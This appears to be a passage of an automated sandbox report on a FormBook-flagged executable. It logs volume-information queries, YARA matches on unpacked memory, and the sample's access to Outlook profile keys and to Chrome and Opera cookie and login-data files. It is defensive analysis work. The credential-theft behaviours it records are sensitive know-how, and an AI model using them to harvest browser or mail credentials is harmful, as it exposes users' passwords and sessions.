Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\control.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\control.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
